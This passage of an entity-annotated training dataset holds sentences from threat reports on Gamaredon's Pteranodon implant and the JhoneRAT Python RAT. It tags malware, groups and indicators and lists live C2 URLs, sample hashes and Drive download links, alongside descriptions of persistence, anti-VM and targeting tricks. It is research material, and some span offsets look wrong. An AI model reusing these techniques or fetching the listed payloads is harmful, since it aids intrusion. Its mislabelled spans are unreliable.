"Some static information about SFX are :", "spans": {"System: SFX": [[30, 33]]}, "info": {"id": "aptner_train_001097", "source": "aptner_train"}} {"text": "Hash : 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 .", "spans": {"Indicator: 3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1": [[7, 71]]}, "info": {"id": "aptner_train_001098", "source": "aptner_train"}} {"text": "Threat : Gamaredon Pteranodon implant SFX archive .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]], "System: SFX archive": [[38, 49]]}, "info": {"id": "aptner_train_001099", "source": "aptner_train"}} {"text": "Brief Description : SFX Archive Second Stage .", "spans": {"System: SFX Archive": [[20, 31]]}, "info": {"id": "aptner_train_001100", "source": "aptner_train"}} {"text": "Ssdeep : 
24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM : OoZwxVvfoaPu .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001101", "source": "aptner_train"}} {"text": "Exploring it , it is possible to see several files inside of it ,  as well as the 6323 file .", "spans": {"Indicator: 6323": [[81, 85]]}, "info": {"id": "aptner_train_001102", "source": "aptner_train"}} {"text": "In this case , the SFX archive contains 8 files : five of them are legit DLLs used by the “ 6323 ” executable to interoperate with the OLE format defined and used by Microsoft Office .", "spans": {"Indicator: SFX archive": [[19, 30]], "System: DLLs": [[71, 75]], "Indicator: 6323": [[90, 94]], "System: OLE": [[133, 136]], "System: Microsoft Office": [[163, 178]]}, "info": {"id": "aptner_train_001103", "source": "aptner_train"}} {"text": "The “ ExcelMyMacros.txt ” and “ wordMacros.txt ” files contain further macro script , described next .", "spans": {"Indicator: ExcelMyMacros.txt": [[6, 23]], "Indicator: wordMacros.txt": [[32, 46]]}, "info": {"id": "aptner_train_001104", "source": "aptner_train"}} {"text": "So , static analysis on the “ 6323 ” file shown as its nature : it is written using Microsoft Visual Studio .NET , therefore easily to reverse .", "spans": {"Indicator: 6323": [[30, 34]], "System: Microsoft Visual Studio .NET": [[83, 111]]}, "info": {"id": "aptner_train_001105", "source": "aptner_train"}} {"text": "Before reversing the executable , it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code .", "spans": {}, "info": {"id": "aptner_train_001106", "source": "aptner_train"}} {"text": "The below image shows the information about the sample before and after the cleaning .", "spans": {}, "info": {"id": "aptner_train_001107", "source": "aptner_train"}} {"text": "The first check performed is on the arguments : if the arguments length is equal to zero , the malware terminates the execution .", "spans": {}, "info": {"id": 
"aptner_train_001108", "source": "aptner_train"}} {"text": "After that , the malware checks if the existence of the files “ ExcelMyMacros.txt ” and “ wordMacros.txt ” in the same path where it is executed : if true then it reads their contents otherwise it will exit .", "spans": {"Indicator: ExcelMyMacros.txt": [[63, 80]], "Indicator: wordMacros.txt": [[89, 103]]}, "info": {"id": "aptner_train_001109", "source": "aptner_train"}} {"text": "As visible in the previous figure , the only difference between the files are in the variable , registry key and path used by Word rather than by Excel .", "spans": {"System: Excel": [[144, 149]]}, "info": {"id": "aptner_train_001110", "source": "aptner_train"}} {"text": "Finally the macros are executed using the Office engine .", "spans": {"System: macros": [[12, 18]], "System: Office": [[42, 47]]}, "info": {"id": "aptner_train_001111", "source": "aptner_train"}} {"text": "So let ’s start to dissect the macros .", "spans": {"System: macros": [[31, 37]]}, "info": {"id": "aptner_train_001112", "source": "aptner_train"}} {"text": "For a better comprehension we will be considering only one macro and in the specific case we will analyze “ wordMacros.txt ”   ones .", "spans": {"System: macro": [[59, 64]], "Indicator: wordMacros.txt": [[107, 121]]}, "info": {"id": "aptner_train_001113", "source": "aptner_train"}} {"text": "First of all the macro will set the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes : the first one will run a “ IndexOffice.vbs ” in the path “ %APPDATA%\\Microsoft\\Office\\ ” and the second one will run “ IndexOffice.exe ” in the same path .", "spans": {"System: macro": [[17, 22]], "Indicator: IndexOffice.vbs": [[265, 279]], "Indicator: IndexOffice.exe": [[355, 369]]}, "info": {"id": "aptner_train_001114", "source": "aptner_train"}} {"text": "Finally , the 
malware will write the “ IndexOffice.txt ” file in the  “ %APPDATA%\\Microsoft\\Office\\ ” path .", "spans": {"Indicator: IndexOffice.txt": [[39, 53]]}, "info": {"id": "aptner_train_001115", "source": "aptner_train"}} {"text": "The script will check the presence of the  “ IndexOffice.exe ” artifact : if true then it will delete it and it will download a new file/script from “ http://masseffect.space/_/post.php ” .", "spans": {"Indicator: IndexOffice.exe": [[45, 59]], "Indicator: http://masseffect.space/_/post.php": [[149, 206]]}, "info": {"id": "aptner_train_001116", "source": "aptner_train"}} {"text": "The malware tries to save the C2 response and encoding it using Encode function .", "spans": {"System: C2": [[30, 32]]}, "info": {"id": "aptner_train_001117", "source": "aptner_train"}} {"text": "This function accepts three parameters : the input file , the output file and the arrKey ; arrKey is calculated thanks to  GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results .", "spans": {"System: Driver SN": [[188, 197]]}, "info": {"id": "aptner_train_001118", "source": "aptner_train"}} {"text": "Gamaredon cyberwarfare operations against Ukraine are still active .", "spans": {"Organization: Gamaredon": [[0, 9]]}, "info": {"id": "aptner_train_001119", "source": "aptner_train"}} {"text": "This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years .", "spans": {}, "info": {"id": "aptner_train_001120", "source": "aptner_train"}} {"text": "The massive use of weaponized Office documents , Office template injection , sfx archives , wmi and some VBA macro stages that dinamically changes ,  make the Pterodon attack chain very malleable and adaptive .", "spans": {"System: Office": [[30, 35], [48, 53]], "System: sfx archives": [[75, 87]], "System: wmi": [[90, 93]], "System: VBA macro": [[103, 112]], "System: stages": [[113, 119]], "Malware: 
Pterodon": [[157, 165]]}, "info": {"id": "aptner_train_001121", "source": "aptner_train"}} {"text": "However , the introduction of a .Net component is a novelty compared to previous Pterodon samples .", "spans": {"System: .Net": [[32, 36]], "Malware: Pterodon": [[81, 89]]}, "info": {"id": "aptner_train_001122", "source": "aptner_train"}} {"text": "Gamaredon : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[12, 76]]}, "info": {"id": "aptner_train_001123", "source": "aptner_train"}} {"text": "Gamaredon : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8": [[12, 76]]}, "info": {"id": "aptner_train_001124", "source": "aptner_train"}} {"text": "Gamaredon : def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c": [[12, 76]]}, "info": {"id": "aptner_train_001125", "source": "aptner_train"}} {"text": "Gamaredon : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[12, 76]]}, "info": {"id": "aptner_train_001126", "source": "aptner_train"}} {"text": "Gamaredon : 86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: 86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc": [[12, 76]]}, "info": {"id": "aptner_train_001127", "source": "aptner_train"}} {"text": "Gamaredon : http://win-apu.ddns.net/apu.dot/ .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: http://win-apu.ddns.net/apu.dot/": [[12, 44]]}, "info": {"id": 
"aptner_train_001128", "source": "aptner_train"}} {"text": "Gamaredon : http://get-icons.ddns.net/apu.dot/ .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: http://get-icons.ddns.net/apu.dot/": [[12, 46]]}, "info": {"id": "aptner_train_001129", "source": "aptner_train"}} {"text": "Gamaredon : http://masseffect.space/ .", "spans": {"Organization: Gamaredon": [[0, 9]], "Indicator: http://masseffect.space/": [[12, 36]]}, "info": {"id": "aptner_train_001130", "source": "aptner_train"}} {"text": "JhoneRAT : Cloud based python RAT targeting Middle Eastern countries .", "spans": {"Malware: JhoneRAT": [[0, 8]], "System: python": [[23, 29]], "System: RAT": [[30, 33]]}, "info": {"id": "aptner_train_001131", "source": "aptner_train"}} {"text": "Today , Cisco Talos is unveiling the details of a new RAT we have identified we 're calling \" JhoneRAT \" .", "spans": {"Organization: Cisco Talos": [[8, 19]], "System: RAT": [[54, 57]], "Malware: JhoneRAT": [[94, 102]]}, "info": {"id": "aptner_train_001132", "source": "aptner_train"}} {"text": "This new RAT is dropped to the victims via malicious Microsoft Office docume .", "spans": {"System: RAT": [[9, 12]], "Organization: Microsoft": [[53, 62]], "System: Office": [[63, 69]], "System: docume": [[70, 76]]}, "info": {"id": "aptner_train_001133", "source": "aptner_train"}} {"text": "The dropper , along with the Python RAT , attempts to gather information on the victim 's machine and then uses multiple cloud services : Google Drive , Twitter , ImgBB and Google Forms .", "spans": {"System: Python RAT": [[29, 39]], "System: Google Drive": [[138, 150]], "System: Twitter": [[153, 160]], "System: ImgBB": [[163, 168]], "System: Google Forms": [[173, 185]]}, "info": {"id": "aptner_train_001134", "source": "aptner_train"}} {"text": "The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase .", "spans": {"System: RAT": [[4, 7]]}, "info": {"id": "aptner_train_001135", 
"source": "aptner_train"}} {"text": "This particular RAT attempts to target a very specific set of Arabic-speaking countries .", "spans": {"System: RAT": [[16, 19]]}, "info": {"id": "aptner_train_001136", "source": "aptner_train"}} {"text": "The filtering is performed by checking the keyboard layout of the infected systems .", "spans": {}, "info": {"id": "aptner_train_001137", "source": "aptner_train"}} {"text": "Based on the analysed sample , JhoneRAT targets Saudi Arabia , Iraq , Egypt , Libya , Algeria , Morocco , Tunisia , Oman , Yemen , Syria , UAE , Kuwait , Bahrain and Lebanon .", "spans": {"Malware: JhoneRAT": [[31, 39]]}, "info": {"id": "aptner_train_001138", "source": "aptner_train"}} {"text": "The campaign shows an actor that developed a homemade RAT that works in multiple layers hosted on cloud providers .", "spans": {}, "info": {"id": "aptner_train_001139", "source": "aptner_train"}} {"text": "JhoneRAT is developed in python but not based on public source code , as it is often the case for this type of malware .", "spans": {"Malware: JhoneRAT": [[0, 8]], "System: python": [[25, 31]]}, "info": {"id": "aptner_train_001140", "source": "aptner_train"}} {"text": "The attackers put great effort to carefully select the targets located in specific countries based on the victim 's keyboard layout .", "spans": {}, "info": {"id": "aptner_train_001141", "source": "aptner_train"}} {"text": "Everything starts with a malicious document using a well-known vulnerability to download a malicious document hosted on the internet .", "spans": {}, "info": {"id": "aptner_train_001142", "source": "aptner_train"}} {"text": "For this campaign , the attacker chose to use a cloud provider ( Google ) with a good reputation to avoid URL blacklisting .", "spans": {"Organization: Google": [[65, 71]]}, "info": {"id": "aptner_train_001143", "source": "aptner_train"}} {"text": "The malware is divided into a couple of layers — each layer downloads a new payload on a cloud provider to get 
the final RAT developed in python and that uses additional providers such as Twitter and ImgBB .", "spans": {"System: RAT": [[121, 124]], "System: python": [[138, 144]], "System: Twitter": [[188, 195]], "System: ImgBB": [[200, 205]]}, "info": {"id": "aptner_train_001144", "source": "aptner_train"}} {"text": "This RAT is a good example of how a highly focused attack that tries to blend its network traffic into the crowd can be highly effective .", "spans": {"System: RAT": [[5, 8]]}, "info": {"id": "aptner_train_001145", "source": "aptner_train"}} {"text": "In this campaign , focusing detection of the network is not the best approach .", "spans": {}, "info": {"id": "aptner_train_001146", "source": "aptner_train"}} {"text": "Instead , the detection must be based on the behaviour on the operating system .", "spans": {}, "info": {"id": "aptner_train_001147", "source": "aptner_train"}} {"text": "Attackers can abuse well-known cloud providers and abuse their reputations in order to avoid detection .", "spans": {"System: well-known cloud providers": [[20, 46]]}, "info": {"id": "aptner_train_001148", "source": "aptner_train"}} {"text": "The fact that this attacker decided to leverage cloud services and four different services — and not their own infrastructure — is smart from an opsec point of view .", "spans": {"System: cloud services": [[48, 62]], "System: four different services": [[67, 90]]}, "info": {"id": "aptner_train_001149", "source": "aptner_train"}} {"text": "It is hard for the targets to identify legitimate and malicious traffic to cloud provider infrastructure .", "spans": {}, "info": {"id": "aptner_train_001150", "source": "aptner_train"}} {"text": "Moreover , this kind of infrastructure uses HTTPS and the flow is encrypted that makes man-in-the-middle interception more complicated for the defender .", "spans": {}, "info": {"id": "aptner_train_001151", "source": "aptner_train"}} {"text": "It is not the first time an attacker used only cloud providers .", 
"spans": {"System: cloud providers": [[47, 62]]}, "info": {"id": "aptner_train_001152", "source": "aptner_train"}} {"text": "Even while using these services , the authors of this JhoneRAT went further and used different user-agent strings depending on the request , and even on the downloaders the authors used other user-agent strings .", "spans": {"Malware: JhoneRAT": [[54, 62]]}, "info": {"id": "aptner_train_001153", "source": "aptner_train"}} {"text": "We already published a couple of articles about ROKRAT ( here , here , here and here ) where another unrelated actor , Group123 , made the same choice but with different providers .", "spans": {"Malware: ROKRAT": [[48, 54]], "Organization: Group123": [[119, 127]]}, "info": {"id": "aptner_train_001154", "source": "aptner_train"}} {"text": "The attacker implemented filtering based on the keyboard 's layout .", "spans": {}, "info": {"id": "aptner_train_001155", "source": "aptner_train"}} {"text": "The malware is executed only for the following layout , the country is based on the Microsoft website :", "spans": {"Organization: Microsoft": [[84, 93]]}, "info": {"id": "aptner_train_001156", "source": "aptner_train"}} {"text": "' 0401 ' : Saudi Arabia . ' 0801 ' : Iraq . ' 0c01 ' : Egypt . ' 1001 ' : Libya . ' 1401 ' : Algeria . ' 1801 ' : Morocco . ' 1c01 ' : Tunisia . ' 2001 ' : Oman . ' 2401 ' : Yemen . ' 2801 ' : Syria . ' 3801 ' : UAE . ' 3401 ' : Kuwait . ' 3c01 ' : Bahrain . 
' 3001 ' : Lebanon .", "spans": {}, "info": {"id": "aptner_train_001157", "source": "aptner_train"}} {"text": "We identified three malicious Microsoft Office documents that download and load an additional Office document with a Macro .", "spans": {"Organization: Microsoft": [[30, 39]], "System: Office": [[40, 46]], "System: Macro": [[117, 122]]}, "info": {"id": "aptner_train_001158", "source": "aptner_train"}} {"text": "The oldest one from November 2019 , named \" Urgent.docx \" .", "spans": {"Indicator: Urgent.docx": [[44, 55]]}, "info": {"id": "aptner_train_001159", "source": "aptner_train"}} {"text": "The author of the document asks to enable editing in English and in Arabic .", "spans": {}, "info": {"id": "aptner_train_001160", "source": "aptner_train"}} {"text": "The second document from the beginning of January is named \" fb.docx \" and contains usernames and passwords from an alleged \" Facebook \" leak .", "spans": {"Indicator: fb.docx": [[61, 68]], "Organization: Facebook": [[126, 134]]}, "info": {"id": "aptner_train_001161", "source": "aptner_train"}} {"text": "The more recent document is from mid-January and alleged to be from a United Arab Emirate organization .", "spans": {}, "info": {"id": "aptner_train_001162", "source": "aptner_train"}} {"text": "The author blurred the content and asks the user to enable editing to see the content .", "spans": {}, "info": {"id": "aptner_train_001163", "source": "aptner_train"}} {"text": "In the three documents , an additional Office document containing a Macro is downloaded and executed .", "spans": {"System: Office document": [[39, 54]], "System: Macro": [[68, 73]]}, "info": {"id": "aptner_train_001164", "source": "aptner_train"}} {"text": "The documents are located on Google Drive .", "spans": {"System: Google Drive": [[29, 41]]}, "info": {"id": "aptner_train_001165", "source": "aptner_train"}} {"text": "The template located on Google Drive contains a macro .", "spans": {"System: Google Drive": [[24, 36]], 
"System: macro": [[48, 53]]}, "info": {"id": "aptner_train_001166", "source": "aptner_train"}} {"text": "The macro contains a virtual machine detection technique based on the serial number of the disks available in the victim environment .", "spans": {}, "info": {"id": "aptner_train_001167", "source": "aptner_train"}} {"text": "Indeed , some VMs do not have serial numbers and the macro is executed only if a serial number exists .", "spans": {"System: VMs": [[14, 17]]}, "info": {"id": "aptner_train_001168", "source": "aptner_train"}} {"text": "A WMIC command is executed to get this information on the targeted system .", "spans": {"System: WMIC": [[2, 6]]}, "info": {"id": "aptner_train_001169", "source": "aptner_train"}} {"text": "If a serial number exists , the rest of the code is executed .", "spans": {}, "info": {"id": "aptner_train_001170", "source": "aptner_train"}} {"text": "The purpose is to download an image from a new Google Drive link .", "spans": {}, "info": {"id": "aptner_train_001171", "source": "aptner_train"}} {"text": "It is interesting to note that the filename of the downloaded image is randomly generated based on a dictionary : Array (\"cartoon\" , \"img\" ,\"photo\") .", "spans": {}, "info": {"id": "aptner_train_001172", "source": "aptner_train"}} {"text": "The filename will be cartoon.jpg or img.jpg or photo.jpg and the image usually depicts a cartoon .", "spans": {"Indicator: cartoon.jpg": [[21, 32]], "Indicator: img.jpg": [[36, 43]], "Indicator: photo.jpg": [[47, 56]]}, "info": {"id": "aptner_train_001173", "source": "aptner_train"}} {"text": "The image file is a real image with a base64-encoded binary appended at the end .", "spans": {}, "info": {"id": "aptner_train_001174", "source": "aptner_train"}} {"text": "The malware author has a curious sense of humor .", "spans": {}, "info": {"id": "aptner_train_001175", "source": "aptner_train"}} {"text": "The base64 data and image are separated by the \" **** \" string .", "spans": {}, "info": {"id": 
"aptner_train_001176", "source": "aptner_train"}} {"text": "The decoded binary filename is also randomly generated based on a dictionary : Array(\"proc\" , \"chrome\" , \"winrar\") .", "spans": {}, "info": {"id": "aptner_train_001177", "source": "aptner_train"}} {"text": "It can be proc.exe or chrome.exe or winrar.exe .", "spans": {"Indicator: proc.exe": [[10, 18]], "Indicator: chrome.exe": [[22, 32]], "Indicator: winrar.exe": [[36, 46]]}, "info": {"id": "aptner_train_001178", "source": "aptner_train"}} {"text": "The decoded base64 data is an AutoIT binary .", "spans": {"System: AutoIT": [[30, 36]]}, "info": {"id": "aptner_train_001179", "source": "aptner_train"}} {"text": "This binary downloads a new file on Google Drive .", "spans": {"System: Google Drive": [[36, 48]]}, "info": {"id": "aptner_train_001180", "source": "aptner_train"}} {"text": "The filename is also randomly generated based on a dictionary $ARRAY[5]=[\"prc\" ,\"winrar\" ,\"chrome\" ,\"sync\" ,\"COM surr\"] .", "spans": {}, "info": {"id": "aptner_train_001181", "source": "aptner_train"}} {"text": "The final payload is a remote access tool ( RAT ) written in python .", "spans": {"System: remote access tool": [[23, 41]], "System: RAT": [[44, 47]], "System: python": [[61, 67]]}, "info": {"id": "aptner_train_001182", "source": "aptner_train"}} {"text": "We named this RAT \" JhoneRAT \" .", "spans": {"System: RAT": [[14, 17]], "Malware: JhoneRAT": [[20, 28]]}, "info": {"id": "aptner_train_001183", "source": "aptner_train"}} {"text": "The python code is wrapped into an executable using pyinstaller .", "spans": {"System: python": [[4, 10]]}, "info": {"id": "aptner_train_001184", "source": "aptner_train"}} {"text": "It uses minimal obfuscation applied only on variables and function naming .", "spans": {}, "info": {"id": "aptner_train_001185", "source": "aptner_train"}} {"text": "The RAT starts by launching three threads .", "spans": {"System: RAT": [[4, 7]]}, "info": {"id": "aptner_train_001186", "source": 
"aptner_train"}} {"text": "The first is responsible for checking if the system has the targeted keyboard layout — this is exclusively in Arabic-speaking countries .", "spans": {}, "info": {"id": "aptner_train_001187", "source": "aptner_train"}} {"text": "The second will create the persistence and , finally , the last one to be started is the main cycle for the RAT .", "spans": {"System: RAT": [[108, 111]]}, "info": {"id": "aptner_train_001188", "source": "aptner_train"}} {"text": "As we explained before , the RAT targets specific countries by checking the keyboard 's layout .", "spans": {"System: RAT": [[29, 32]]}, "info": {"id": "aptner_train_001189", "source": "aptner_train"}} {"text": "In fact , this is one of the first checks it performs when it is executed .", "spans": {}, "info": {"id": "aptner_train_001190", "source": "aptner_train"}} {"text": "The persistence is achieved by adding an entry with the name \" ChromeUpdater \" to the ' Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run ' .", "spans": {}, "info": {"id": "aptner_train_001191", "source": "aptner_train"}} {"text": "This RAT uses three different cloud services to perform all its command and control ( C2 ) activities .", "spans": {"System: RAT": [[5, 8]], "System: command and control": [[64, 83]], "System: C2": [[86, 88]]}, "info": {"id": "aptner_train_001192", "source": "aptner_train"}} {"text": "It checks for new commands in the tweets from the handle @jhone87438316 ( suspended by Twitter ) every 10 seconds using the BeautifulSoup HTML parser to identify new tweets .", "spans": {"System: Twitter": [[87, 94]], "System: BeautifulSoup HTML parser": [[124, 149]]}, "info": {"id": "aptner_train_001193", "source": "aptner_train"}} {"text": "These commands can be issued to a specific victim based on the UID generated on each target ( by using the disk serial and contextual information such as the hostname , the antivirus and the OS ) or to all of them .", "spans": {}, "info": {"id": 
"aptner_train_001194", "source": "aptner_train"}} {"text": "The Exfiltration , however , is done via other cloud providers .", "spans": {"System: cloud providers": [[47, 62]]}, "info": {"id": "aptner_train_001195", "source": "aptner_train"}} {"text": "The screenshots are exfiltrated via the ImgBB website .", "spans": {"System: ImgBB": [[40, 45]]}, "info": {"id": "aptner_train_001196", "source": "aptner_train"}} {"text": "The remaining commands send feedback by posting data into Google Forms .", "spans": {"System: Google Forms": [[58, 70]]}, "info": {"id": "aptner_train_001197", "source": "aptner_train"}} {"text": "Finally , the RAT is able to download files encoded in base64 on Google Drive .", "spans": {"System: RAT": [[14, 17]], "System: Google Drive": [[65, 77]]}, "info": {"id": "aptner_train_001198", "source": "aptner_train"}} {"text": "Feature-wise , the RAT has three commands :", "spans": {"System: RAT": [[19, 22]]}, "info": {"id": "aptner_train_001199", "source": "aptner_train"}} {"text": "Take a screenshot and upload it to ImgBB .", "spans": {"System: ImgBB": [[35, 40]]}, "info": {"id": "aptner_train_001200", "source": "aptner_train"}} {"text": "Download binary disguised has a picture from Google Drive and execute it .", "spans": {"System: Google Drive": [[45, 57]]}, "info": {"id": "aptner_train_001201", "source": "aptner_train"}} {"text": "Execute a command and send the output to Google Forms .", "spans": {"System: Google Forms": [[41, 53]]}, "info": {"id": "aptner_train_001202", "source": "aptner_train"}} {"text": "The attacker put a couple of tricks in place to avoid execution on virtual machines ( sandbox ) .", "spans": {"System: sandbox": [[86, 93]]}, "info": {"id": "aptner_train_001203", "source": "aptner_train"}} {"text": "The first trick is the check of the serial number of the disk .", "spans": {}, "info": {"id": "aptner_train_001204", "source": "aptner_train"}} {"text": "The actor used the same technique in the macro and in the JhoneRAT .", 
"spans": {"System: macro": [[41, 46]], "Malware: JhoneRAT": [[58, 66]]}, "info": {"id": "aptner_train_001205", "source": "aptner_train"}} {"text": "By default , most of the virtual machines do not have a serial number on the disk .", "spans": {}, "info": {"id": "aptner_train_001206", "source": "aptner_train"}} {"text": "The attacker used a second trick to avoid analysis of the python code .", "spans": {"System: python": [[58, 64]]}, "info": {"id": "aptner_train_001207", "source": "aptner_train"}} {"text": "The actor used the same trick that FireEye in the Flare-On 6 : Challenge 7: They removed the header of the python bytecode .", "spans": {"Organization: FireEye": [[35, 42]], "System: Flare-On 6": [[50, 60]], "System: python": [[107, 113]]}, "info": {"id": "aptner_train_001208", "source": "aptner_train"}} {"text": "It can be perfectly executed without the header , but tools such as uncompyle6 need this header : $ uncompyle6 final2 .", "spans": {"System: uncompyle6": [[68, 78], [100, 110]]}, "info": {"id": "aptner_train_001209", "source": "aptner_train"}} {"text": "ImportError : Unknown magic number 227 in final2 .", "spans": {}, "info": {"id": "aptner_train_001210", "source": "aptner_train"}} {"text": "Additionally , the generated code by uncompyle6 varies depending on the version and the impact is important .", "spans": {"System: uncompyle6": [[37, 47]]}, "info": {"id": "aptner_train_001211", "source": "aptner_train"}} {"text": "Based on our analysis and the behaviour of the executed malware , the correct interpretation is the first one based on the oldest version of uncompyle6 .", "spans": {"System: uncompyle6": [[141, 151]]}, "info": {"id": "aptner_train_001212", "source": "aptner_train"}} {"text": "For this specific condition , it is important because it 's filtering on the keyboard layout to identify the targets .", "spans": {}, "info": {"id": "aptner_train_001213", "source": "aptner_train"}} {"text": "This campaign shows a threat actor interested in specific 
Middle Eastern and Arabic-speaking countries .", "spans": {}, "info": {"id": "aptner_train_001214", "source": "aptner_train"}} {"text": "It also shows us an actor that puts effort in opsec by only using cloud providers .", "spans": {"System: opsec": [[46, 51]], "System: cloud providers": [[66, 81]]}, "info": {"id": "aptner_train_001215", "source": "aptner_train"}} {"text": "The malicious documents , the droppers and the RAT itself are developed around cloud providers .", "spans": {"System: RAT": [[47, 50]], "System: cloud providers": [[79, 94]]}, "info": {"id": "aptner_train_001216", "source": "aptner_train"}} {"text": "Additionally the attackers implemented anti-VM ( and sandbox ) and anti-analysis tricks to hide the malicious activities to the analyst .", "spans": {"System: anti-VM": [[39, 46]], "System: sandbox": [[53, 60]], "System: anti-analysis tricks": [[67, 87]]}, "info": {"id": "aptner_train_001217", "source": "aptner_train"}} {"text": "For example , the VM or the sandbox must have the keyboard layout of the targeted countries and a disk serial number .", "spans": {"System: VM": [[18, 20]], "System: sandbox": [[28, 35]]}, "info": {"id": "aptner_train_001218", "source": "aptner_train"}} {"text": "This campaign started in November 2019 and it is still ongoing .", "spans": {}, "info": {"id": "aptner_train_001219", "source": "aptner_train"}} {"text": "At this time , the API key is revoked and the Twitter account is suspended .", "spans": {"System: Twitter": [[46, 53]]}, "info": {"id": "aptner_train_001220", "source": "aptner_train"}} {"text": "However , the attacker can easily create new accounts and update the malicious files in order to still work .", "spans": {}, "info": {"id": "aptner_train_001221", "source": "aptner_train"}} {"text": "This campaign shows us that network-based detection is important but must be completed by system behaviour analysis .", "spans": {}, "info": {"id": "aptner_train_001222", "source": "aptner_train"}} {"text": "JhoneRAT : 
273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f": [[11, 75]]}, "info": {"id": "aptner_train_001223", "source": "aptner_train"}} {"text": "JhoneRAT : 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091": [[11, 75]]}, "info": {"id": "aptner_train_001224", "source": "aptner_train"}} {"text": "JhoneRAT : d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: d5f10a0b5c103100a3e74aa9014032c47aa8973b564b3ab03ae817744e74d079": [[11, 75]]}, "info": {"id": "aptner_train_001225", "source": "aptner_train"}} {"text": "JhoneRAT : 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4": [[11, 75]]}, "info": {"id": "aptner_train_001226", "source": "aptner_train"}} {"text": "JhoneRAT : 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69": [[11, 75]]}, "info": {"id": "aptner_train_001227", "source": "aptner_train"}} {"text": "JhoneRAT : b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366": [[11, 75]]}, "info": {"id": "aptner_train_001228", "source": "aptner_train"}} {"text": "JhoneRAT : https://drive.google.com/uc?export=download&id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Malware: https://drive.google.com/uc?export=download&id=1vED0wN0arm9yu7C7XrbCdspLjpoPKfrQ": [[11, 95]]}, "info": {"id": "aptner_train_001229", 
"source": "aptner_train"}} {"text": "JhoneRAT : https://drive.google.com/uc?export=download&id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl": [[11, 95]]}, "info": {"id": "aptner_train_001230", "source": "aptner_train"}} {"text": "JhoneRAT : https://drive.google.com/uc?export=download&id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd": [[11, 95]]}, "info": {"id": "aptner_train_001231", "source": "aptner_train"}} {"text": "JhoneRAT : https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD": [[11, 91]]}, "info": {"id": "aptner_train_001232", "source": "aptner_train"}} {"text": "JhoneRAT : https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a": [[11, 91]]}, "info": {"id": "aptner_train_001233", "source": "aptner_train"}} {"text": "JhoneRAT : 